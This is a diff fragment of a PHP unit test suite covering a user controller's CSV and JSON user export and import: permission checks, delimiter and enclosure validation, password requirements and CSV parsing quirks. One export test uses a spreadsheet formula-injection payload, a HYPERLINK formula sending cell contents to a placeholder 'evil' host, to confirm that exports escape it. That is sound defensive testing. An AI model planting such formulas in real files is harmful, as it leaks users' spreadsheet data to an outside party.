+   * @return M\MockInterface&UserController
+   */
+  private function newControllerWithMockedCreateUser()
+  {
+    global $container;
+    $controller = M::mock(UserController::class . '[createUserFromImportRow]', [$container])
+      ->shouldAllowMockingProtectedMethods();
+    return $controller;
+  }
+
+  /**
+   * Build a mocked request carrying the given "format" query parameter
+   * (plus any extra query params), for handleExportUsers() tests.
+   *
+   * @param string|null $format Value for the "format" query parameter, or
+   *   null to omit it (exercises the default-to-csv behavior).
+   * @param array $extraParams Additional query params, e.g. delimiter/enclosure.
+   * @return M\MockInterface&Request
+   */
+  private function mockExportRequest($format, $extraParams = [])
+  {
+    $request = M::mock(Request::class);
+    $params = array_merge($format === null ? [] : ['format' => $format], $extraParams);
+    $request->shouldReceive('getQueryParams')->andReturn($params);
+    return $request;
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() for non-admin user
+   * -# Check if HttpForbiddenException is thrown
+   */
+  public function testExportUsersToCSVNotAdmin()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_WRITE;
+    $this->expectException(HttpForbiddenException::class);
+    $this->userController->handleExportUsers(null, new ResponseHelper(), []);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() exports all users as CSV
+   * -# Check headers and that the "mimetype" DB flag round-trips to the
+   *    "agent_mime" CSV column
+   */
+  public function testExportUsersToCSV()
+  {
+    $users = [
+      new User(2, "user2", "User 2", "user2@example.com", PLUGIN_DB_ADMIN, 2,
+        true, "nomos,monk,mimetype"),
+    ];
+    $this->dbHelper->shouldReceive('getUsers')->andReturn($users);
+
+    $response = $this->userController->handleExportUsers(
+      $this->mockExportRequest('csv'), new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+    $this->assertStringContainsString('csv', $response->getHeaderLine('Content-type'));
+    $this->assertStringContainsString('attachment', $response->getHeaderLine('Content-Disposition'));
+
+    $body = str_replace("\r\n", "\n", (string) $response->getBody());
+    $lines = array_values(array_filter(explode("\n", $body), function ($line) {
+      return $line !== '';
+    }));
+    $header = str_getcsv($lines[0]);
+    $row = array_combine($header, str_getcsv($lines[1]));
+
+    $this->assertEquals('user2', $row['name']);
+    $this->assertEquals('admin', $row['accessLevel']);
+    $this->assertEquals('1', $row['agent_mime']);
+    $this->assertEquals('1', $row['agent_monk']);
+    $this->assertEquals('0', $row['agent_ecc']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with a user description that
+   *    looks like a spreadsheet formula
+   * -# Check that it is prefixed with a single quote so Excel/LibreOffice/
+   *    Sheets treat it as text instead of executing it as a formula
+   */
+  public function testExportUsersToCSVEscapesFormulaInjection()
+  {
+    $users = [
+      new User(4, "user4", "=HYPERLINK(\"http://evil/?x=\"&A1,\"x\")",
+        "user4@example.com", PLUGIN_DB_WRITE, 2, false, ""),
+    ];
+    $this->dbHelper->shouldReceive('getUsers')->andReturn($users);
+
+    $response = $this->userController->handleExportUsers(
+      $this->mockExportRequest('csv'), new ResponseHelper(), []);
+    $body = str_replace("\r\n", "\n", (string) $response->getBody());
+    $lines = array_values(array_filter(explode("\n", $body), function ($line) {
+      return $line !== '';
+    }));
+    $header = str_getcsv($lines[0]);
+    $row = array_combine($header, str_getcsv($lines[1]));
+
+    $this->assertStringStartsWith("'=", $row['description']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with no "format" query
+   *    parameter given
+   * -# Check that it defaults to CSV
+   */
+  public function testExportUsersDefaultsToCsv()
+  {
+    $users = [
+      new User(2, "user2", "User 2", "user2@example.com", PLUGIN_DB_ADMIN, 2, true, ""),
+    ];
+    $this->dbHelper->shouldReceive('getUsers')->andReturn($users);
+
+    $response = $this->userController->handleExportUsers(
+      $this->mockExportRequest(null), new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+    $this->assertStringContainsString('csv', $response->getHeaderLine('Content-type'));
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with an unsupported
+   *    "format" query parameter value
+   * -# Check if HttpBadRequestException is thrown
+   */
+  public function testExportUsersInvalidFormat()
+  {
+    $this->expectException(HttpBadRequestException::class);
+    $this->userController->handleExportUsers(
+      $this->mockExportRequest('xml'), new ResponseHelper(), []);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with an array-valued
+   *    "format" query parameter (e.g. from ?format[]=csv)
+   * -# Check that it is rejected with the normal HttpBadRequestException
+   *    instead of a TypeError from strtolower(array)
+   */
+  public function testExportUsersArrayFormatDoesNotCrash()
+  {
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getQueryParams')->andReturn(['format' => ['csv']]);
+
+    $this->expectException(HttpBadRequestException::class);
+    $this->userController->handleExportUsers($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with a custom "delimiter"
+   *    query parameter (semicolon, one of CSV_DELIMITERS)
+   * -# Check that the exported CSV actually uses it
+   */
+  public function testExportUsersCsvWithCustomDelimiter()
+  {
+    $users = [
+      new User(2, "user2", "User 2", "user2@example.com", PLUGIN_DB_ADMIN, 2, true, ""),
+    ];
+    $this->dbHelper->shouldReceive('getUsers')->andReturn($users);
+
+    $response = $this->userController->handleExportUsers(
+      $this->mockExportRequest('csv', ['delimiter' => ';']), new ResponseHelper(), []);
+    $body = str_replace("\r\n", "\n", (string) $response->getBody());
+    $lines = array_values(array_filter(explode("\n", $body), function ($line) {
+      return $line !== '';
+    }));
+
+    $this->assertStringContainsString(';', $lines[0]);
+    $header = str_getcsv($lines[0], ';');
+    $row = array_combine($header, str_getcsv($lines[1], ';'));
+    $this->assertEquals('user2', $row['name']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with a tab "delimiter"
+   *    query parameter (an actual tab byte, matching CSV_DELIMITERS)
+   * -# Check that the exported CSV actually uses it
+   */
+  public function testExportUsersCsvWithTabDelimiter()
+  {
+    $users = [
+      new User(2, "user2", "User 2", "user2@example.com", PLUGIN_DB_ADMIN, 2, true, ""),
+    ];
+    $this->dbHelper->shouldReceive('getUsers')->andReturn($users);
+
+    $response = $this->userController->handleExportUsers(
+      $this->mockExportRequest('csv', ['delimiter' => "\t"]), new ResponseHelper(), []);
+    $body = str_replace("\r\n", "\n", (string) $response->getBody());
+    $lines = array_values(array_filter(explode("\n", $body), function ($line) {
+      return $line !== '';
+    }));
+
+    $header = str_getcsv($lines[0], "\t");
+    $row = array_combine($header, str_getcsv($lines[1], "\t"));
+    $this->assertEquals('user2', $row['name']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with a "delimiter" query
+   *    parameter outside CSV_DELIMITERS
+   * -# Check if HttpBadRequestException is thrown
+   */
+  public function testExportUsersRejectsInvalidDelimiter()
+  {
+    $this->expectException(HttpBadRequestException::class);
+    $this->userController->handleExportUsers(
+      $this->mockExportRequest('csv', ['delimiter' => '|']), new ResponseHelper(), []);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with an "enclosure" query
+   *    parameter outside CSV_ENCLOSURES
+   * -# Check if HttpBadRequestException is thrown
+   */
+  public function testExportUsersRejectsInvalidEnclosure()
+  {
+    $this->expectException(HttpBadRequestException::class);
+    $this->userController->handleExportUsers(
+      $this->mockExportRequest('csv', ['enclosure' => '*']), new ResponseHelper(), []);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() with format=json and an
+   *    invalid "delimiter" query parameter
+   * -# Check that delimiter is ignored (no exception) since it only
+   *    applies to the CSV branch
+   */
+  public function testExportUsersJsonIgnoresInvalidDelimiter()
+  {
+    $users = [
+      new User(2, "user2", "User 2", "user2@example.com", PLUGIN_DB_ADMIN, 2, true, ""),
+    ];
+    $this->dbHelper->shouldReceive('getUsers')->andReturn($users);
+
+    $response = $this->userController->handleExportUsers(
+      $this->mockExportRequest('json', ['delimiter' => '|']), new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() for non-admin user
+   * -# Check if HttpForbiddenException is thrown
+   */
+  public function testExportUsersToJSONNotAdmin()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_WRITE;
+    $this->expectException(HttpForbiddenException::class);
+    $this->userController->handleExportUsers(null, new ResponseHelper(), []);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleExportUsers() exports all users as JSON
+   * -# Check the nested agents object and the "mimetype" -> "mime"
+   *    translation
+   */
+  public function testExportUsersToJSON()
+  {
+    $users = [
+      new User(3, "user3", "User 3", "user3@example.com", PLUGIN_DB_WRITE, 2,
+        false, "nomos,mimetype,ecc"),
+    ];
+    $this->dbHelper->shouldReceive('getUsers')->andReturn($users);
+
+    $response = $this->userController->handleExportUsers(
+      $this->mockExportRequest('json'), new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+    $this->assertStringContainsString('json', $response->getHeaderLine('Content-type'));
+
+    $decoded = json_decode((string) $response->getBody(), true);
+    $this->assertCount(1, $decoded);
+    $this->assertEquals('user3', $decoded[0]['name']);
+    $this->assertTrue($decoded[0]['agents']['mime']);
+    $this->assertTrue($decoded[0]['agents']['ecc']);
+    $this->assertFalse($decoded[0]['agents']['monk']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::handleImportUsers() for non-admin user
+   * -# Check if HttpForbiddenException is thrown
+   */
+  public function testHandleImportUsersNotAdmin()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_WRITE;
+    $this->expectException(HttpForbiddenException::class);
+    $this->userController->handleImportUsers(null, new ResponseHelper(), []);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() without a file in the request
+   * -# Check if HttpBadRequestException is thrown
+   */
+  public function testHandleImportUsersNoFileSelected()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $_FILES = [];
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+
+    $this->expectException(HttpBadRequestException::class);
+    $this->expectExceptionMessage("No file selected");
+
+    $this->userController->handleImportUsers($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with an unsupported file
+   *    extension
+   * -# Check if HttpBadRequestException is thrown
+   */
+  public function testHandleImportUsersInvalidExtension()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $path = $this->writeTempFile("not a csv or json", '.txt');
+    $this->setUploadedFile($path, 'users.txt');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+
+    $this->expectException(HttpBadRequestException::class);
+
+    $this->userController->handleImportUsers($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with a CSV file where one
+   *    row succeeds and one row fails
+   * -# Check that the response is a 200 summarizing both outcomes, and that
+   *    the row is translated into the createUserFromImportRow() DTO shape
+   *    correctly
+   */
+  public function testHandleImportUsersCsvPartialSuccess()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name,description,email,accessLevel,rootFolderId,emailNotification,defaultBucketpool," .
+      "agent_bucket,agent_copyrightEmailAuthor,agent_ecc,agent_keyword,agent_mime," .
+      "agent_monk,agent_nomos,agent_ojo,agent_reso\n" .
+      "alice,Alice desc,alice@example.com,read_write,2,1,2,0,0,0,0,1,1,0,0,0\n" .
+      "bob" . str_repeat(',', 15) . "\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn([]);
+
+    $controller = $this->newControllerWithMockedCreateUser();
+    $controller->shouldReceive('createUserFromImportRow')->andReturnUsing(
+      function ($userDetails) {
+        if ($userDetails['name'] === 'alice') {
+          $this->assertEquals('read_write', $userDetails['accessLevel']);
+          $this->assertEquals('2', $userDetails['rootFolderId']);
+          $this->assertTrue($userDetails['emailNotification']);
+          $this->assertTrue($userDetails['agents']['mime']);
+          $this->assertTrue($userDetails['agents']['monk']);
+          $this->assertFalse($userDetails['agents']['bucket']);
+          return [true, "User 'alice' created successfully."];
+        }
+        return [false, 'Username must be specified.'];
+      }
+    );
+
+    $response = $controller->handleImportUsers($request, new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+    $body = json_decode((string) $response->getBody(), true);
+    $this->assertStringContainsString('1 of 2 user(s) imported successfully', $body['message']);
+    $this->assertStringContainsString('bob', $body['message']);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() when the request reaches
+   *    this shared '/users' route group via the /repo/api/v1 URL prefix
+   * -# Check that the parsed row still carries the V2-named agent keys
+   *    (copyrightEmailAuthor, not copyright_email_author), instead of
+   *    silently dropping them because the request came in on the V1 prefix
+   */
+  public function testHandleImportUsersUsesV2DtoRegardlessOfRequestVersion()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name,agent_copyrightEmailAuthor,agent_nomos\n" .
+      "alice,1,1\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V1);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn([]);
+
+    $controller = $this->newControllerWithMockedCreateUser();
+    $controller->shouldReceive('createUserFromImportRow')->once()->andReturnUsing(
+      function ($userDetails) {
+        $this->assertTrue($userDetails['agents']['copyrightEmailAuthor']);
+        $this->assertTrue($userDetails['agents']['nomos']);
+        return [true, 'ok'];
+      }
+    );
+
+    $response = $controller->handleImportUsers($request, new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with a delimiter outside
+   *    CSV_DELIMITERS (also invalid for fgetcsv(), which throws a
+   *    ValueError on PHP >= 8.1 for anything but a single byte)
+   * -# Check if HttpBadRequestException is thrown instead of silently
+   *    truncating to the first character
+   */
+  public function testHandleImportUsersRejectsInvalidDelimiter()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name;;email\nalice;;alice@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn(['delimiter' => ';;', 'enclosure' => '']);
+
+    $this->expectException(HttpBadRequestException::class);
+
+    $this->userController->handleImportUsers($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with an enclosure outside
+   *    CSV_ENCLOSURES
+   * -# Check if HttpBadRequestException is thrown
+   */
+  public function testHandleImportUsersRejectsInvalidEnclosure()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name,email\nalice,alice@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn(['enclosure' => '|']);
+
+    $this->expectException(HttpBadRequestException::class);
+
+    $this->userController->handleImportUsers($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with a tab delimiter (an
+   *    actual tab byte, matching CSV_DELIMITERS -- not the two characters
+   *    "\" and "t")
+   * -# Check that the row is parsed correctly
+   */
+  public function testHandleImportUsersAcceptsTabDelimiter()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name\temail\nalice\talice@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn(['delimiter' => "\t"]);
+
+    $controller = $this->newControllerWithMockedCreateUser();
+    $controller->shouldReceive('createUserFromImportRow')->once()->andReturnUsing(
+      function ($userDetails) {
+        $this->assertEquals('alice', $userDetails['name']);
+        $this->assertEquals('alice@example.com', $userDetails['email']);
+        return [true, 'ok'];
+      }
+    );
+
+    $response = $controller->handleImportUsers($request, new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with a non-string delimiter
+   *    (e.g. a malformed multipart array value)
+   * -# Check that the default delimiter is used instead of erroring
+   */
+  public function testHandleImportUsersIgnoresNonStringDelimiter()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name,email\nalice,alice@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn(['delimiter' => ['a', 'b']]);
+
+    $controller = $this->newControllerWithMockedCreateUser();
+    $controller->shouldReceive('createUserFromImportRow')->once()->andReturn([true, 'ok']);
+
+    $response = $controller->handleImportUsers($request, new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with a JSON file using the
+   *    {"users": [...]} wrapper and a nested agents object
+   * -# Check that the row is translated into the createUserFromImportRow()
+   *    DTO shape correctly
+   */
+  public function testHandleImportUsersJsonWrappedHappyPath()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $json = json_encode([
+      'users' => [
+        [
+          'name' => 'carol',
+          'email' => 'carol@example.com',
+          'accessLevel' => 'read_only',
+          'agents' => ['mime' => true, 'nomos' => true],
+        ],
+      ],
+    ]);
+    $path = $this->writeTempFile($json, '.json');
+    $this->setUploadedFile($path, 'users.json');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+
+    $controller = $this->newControllerWithMockedCreateUser();
+    $controller->shouldReceive('createUserFromImportRow')->once()->andReturnUsing(
+      function ($userDetails) {
+        $this->assertEquals('carol', $userDetails['name']);
+        $this->assertTrue($userDetails['agents']['mime']);
+        $this->assertTrue($userDetails['agents']['nomos']);
+        $this->assertFalse($userDetails['agents']['ecc']);
+        return [true, "User 'carol' created successfully."];
+      }
+    );
+
+    $response = $controller->handleImportUsers($request, new ResponseHelper(), []);
+    $this->assertEquals(200, $response->getStatusCode());
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() where every row fails
+   * -# Check if HttpBadRequestException is thrown
+   */
+  public function testHandleImportUsersAllRowsFail()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name,email\nalice,alice@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn([]);
+
+    $controller = $this->newControllerWithMockedCreateUser();
+    $controller->shouldReceive('createUserFromImportRow')->andReturn([false, 'User already exists.']);
+
+    $this->expectException(HttpBadRequestException::class);
+
+    $controller->handleImportUsers($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::createUserFromImportRow() with no "userPass"
+   * -# Check that it returns a clear failure instead of creating the user
+   *    with an empty/unusable password
+   */
+  public function testCreateUserFromImportRowRequiresPassword()
+  {
+    $result = $this->invokePrivate($this->userController, 'createUserFromImportRow',
+      [['name' => 'alice']]);
+
+    $this->assertFalse($result[0]);
+    $this->assertStringContainsString('Password', $result[1]);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::createUserFromImportRow() with a non-string
+   *    "userPass" (e.g. a malformed JSON value)
+   * -# Check that it is rejected the same way a missing password is,
+   *    rather than being passed through to password_hash() downstream
+   */
+  public function testCreateUserFromImportRowRejectsNonStringPassword()
+  {
+    $result = $this->invokePrivate($this->userController, 'createUserFromImportRow',
+      [['name' => 'alice', 'userPass' => ['not', 'a', 'string']]]);
+
+    $this->assertFalse($result[0]);
+    $this->assertStringContainsString('Password', $result[1]);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with a CSV row missing
+   *    "userPass" (real, unmocked createUserFromImportRow())
+   * -# Check that the row fails with a clear message instead of silently
+   *    creating a user with an empty password
+   */
+  public function testHandleImportUsersMissingPasswordFailsRow()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name,email\nalice,alice@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn([]);
+
+    $this->expectException(HttpBadRequestException::class);
+    $this->expectExceptionMessage('Password must be specified');
+
+    $this->userController->handleImportUsers($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with a blank line between
+   *    a successful row and a row with a missing name
+   * -# Check that the reported row number is the physical file line (4),
+   *    not the post-filtering array position (2)
+   */
+  public function testHandleImportUsersCsvRowNumberAccountsForBlankLines()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $csv = "name,email\n" .
+      "alice,alice@example.com\n" .
+      "\n" .
+      ",noname@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+    $this->setUploadedFile($path, 'users.csv');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+    $request->shouldReceive('getHeaderLine')->withArgs(['Content-Type'])->andReturn('');
+    $request->shouldReceive('getParsedBody')->andReturn([]);
+
+    $controller = $this->newControllerWithMockedCreateUser();
+    $controller->shouldReceive('createUserFromImportRow')->once()->andReturn([true, 'ok']);
+
+    $response = $controller->handleImportUsers($request, new ResponseHelper(), []);
+    $body = json_decode((string) $response->getBody(), true);
+    $this->assertStringContainsString('Row 4: Username must be specified.', $body['message']);
+  }
+
+  /**
+   * @runInSeparateProcess
+   * @preserveGlobalState disabled
+   * @test
+   * -# Test UserController::handleImportUsers() with a single JSON object
+   *    missing "name"
+   * -# Check that it fails with the normal per-row "Username must be
+   *    specified" error instead of the generic "No users found"
+   */
+  public function testHandleImportUsersJsonSingleObjectWithoutNameGivesRowError()
+  {
+    $_SESSION[Auth::USER_LEVEL] = Auth::PERM_ADMIN;
+    $json = json_encode(['email' => 'x@example.com']);
+    $path = $this->writeTempFile($json, '.json');
+    $this->setUploadedFile($path, 'users.json');
+
+    $request = M::mock(Request::class);
+    $request->shouldReceive('getAttribute')->andReturn(ApiVersion::V2);
+
+    $this->expectException(HttpBadRequestException::class);
+    $this->expectExceptionMessage('Username must be specified');
+
+    $this->userController->handleImportUsers($request, new ResponseHelper(), []);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::resolveCsvOption() with a missing, empty, and
+   *    non-string value
+   * -# Check that all three fall back to the given default
+   */
+  public function testResolveCsvOptionDefaults()
+  {
+    $this->assertEquals(',',
+      $this->invokePrivate($this->userController, 'resolveCsvOption',
+        [null, UserController::CSV_DELIMITERS, ',', 'delimiter']));
+    $this->assertEquals(',',
+      $this->invokePrivate($this->userController, 'resolveCsvOption',
+        ['', UserController::CSV_DELIMITERS, ',', 'delimiter']));
+    $this->assertEquals(',',
+      $this->invokePrivate($this->userController, 'resolveCsvOption',
+        [['a'], UserController::CSV_DELIMITERS, ',', 'delimiter']));
+  }
+
+  /**
+   * @test
+   * -# Test UserController::resolveCsvOption() with each allowed value
+   * -# Check that every one of CSV_DELIMITERS/CSV_ENCLOSURES is accepted
+   *    as-is, including the tab byte
+   */
+  public function testResolveCsvOptionAcceptsAllowedValues()
+  {
+    foreach (UserController::CSV_DELIMITERS as $delimiter) {
+      $this->assertEquals($delimiter,
+        $this->invokePrivate($this->userController, 'resolveCsvOption',
+          [$delimiter, UserController::CSV_DELIMITERS, ',', 'delimiter']));
+    }
+    foreach (UserController::CSV_ENCLOSURES as $enclosure) {
+      $this->assertEquals($enclosure,
+        $this->invokePrivate($this->userController, 'resolveCsvOption',
+          [$enclosure, UserController::CSV_ENCLOSURES, '"', 'enclosure']));
+    }
+  }
+
+  /**
+   * @test
+   * -# Test UserController::resolveCsvOption() with a value outside the
+   *    allowed set
+   * -# Check if HttpBadRequestException is thrown
+   */
+  public function testResolveCsvOptionRejectsDisallowedValue()
+  {
+    $this->expectException(HttpBadRequestException::class);
+    $this->invokePrivate($this->userController, 'resolveCsvOption',
+      ['|', UserController::CSV_DELIMITERS, ',', 'delimiter']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::buildImportAgentCheckboxes() for the V2-shaped
+   *    agents DTO produced by importRowToUserDetails()
+   * -# Check that every AGENT_KEYS entry is read correctly for the import
+   *    path, and that pkgagent/softwareHeritage/ipra (deliberately excluded
+   *    from AGENT_KEYS) have no effect even if present in the DTO
+   */
+  public function testBuildImportAgentCheckboxes()
+  {
+    $agentsDto = [
+      'bucket' => true, 'copyrightEmailAuthor' => true, 'ecc' => false,
+      'keyword' => false, 'mime' => true, 'monk' => false,
+      'nomos' => false, 'ojo' => false, 'reso' => false,
+      'pkgagent' => true, 'softwareHeritage' => true, 'ipra' => true,
+    ];
+    $result = $this->invokePrivate($this->userController, 'buildImportAgentCheckboxes',
+      [$agentsDto]);
+
+    $this->assertEquals(1, $result['Check_agent_bucket']);
+    $this->assertEquals(1, $result['Check_agent_copyright']);
+    $this->assertEquals(0, $result['Check_agent_ecc']);
+    $this->assertEquals(1, $result['Check_agent_mimetype']);
+    $this->assertArrayNotHasKey('Check_agent_pkgagent', $result);
+    $this->assertArrayNotHasKey('Check_agent_shagent', $result);
+    $this->assertArrayNotHasKey('Check_agent_ipra', $result);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::buildImportAgentCheckboxes() with no agents given
+   * -# Check that an empty map is returned instead of erroring
+   */
+  public function testBuildImportAgentCheckboxesEmpty()
+  {
+    $result = $this->invokePrivate($this->userController, 'buildImportAgentCheckboxes',
+      [null]);
+    $this->assertEquals([], $result);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersCsv() with a blank line and a ragged
+   *    (too many columns) row
+   * -# Check that both are handled without error, columns map correctly,
+   *    and each row's _csvLineNumber matches its physical file line
+   *    (accounting for the blank line in between)
+   */
+  public function testParseUsersCsv()
+  {
+    $csv = "name,email,agent_mime,agent_monk\n" .
+      "alice,alice@example.com,1,0\n" .
+      "\n" .
+      "bob,bob@example.com,0,1,extra,columns\n";
+    $path = $this->writeTempFile($csv, '.csv');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersCsv', [$path, ',', '"']);
+
+    $this->assertCount(2, $rows);
+    $this->assertEquals('alice', $rows[0]['name']);
+    $this->assertTrue($rows[0]['agents']['mime']);
+    $this->assertFalse($rows[0]['agents']['monk']);
+    $this->assertEquals(2, $rows[0]['_csvLineNumber']);
+    $this->assertEquals('bob', $rows[1]['name']);
+    $this->assertFalse($rows[1]['agents']['mime']);
+    $this->assertTrue($rows[1]['agents']['monk']);
+    $this->assertEquals(4, $rows[1]['_csvLineNumber']);
+  }
+
+  /**
+   * @test
+   * -# Test UserController::parseUsersCsv() with a leading UTF-8 BOM (as
+   *    produced by Excel's "CSV UTF-8" export)
+   * -# Check that the BOM is stripped from the header so "name" is still
+   *    recognized instead of every row silently losing its username
+   */
+  public function testParseUsersCsvStripsUtf8Bom()
+  {
+    $csv = "\xEF\xBB\xBFname,email\nalice,alice@example.com\n";
+    $path = $this->writeTempFile($csv, '.csv');
+
+    $rows = $this->invokePrivate($this->userController, 'parseUsersCsv', [$path, ',', '"']);
+
+    $this->assertCount(1, $rows);
+    $this->assertEquals('alice', $rows[0]['name']);
+  }
+
+  /**
+   * @test
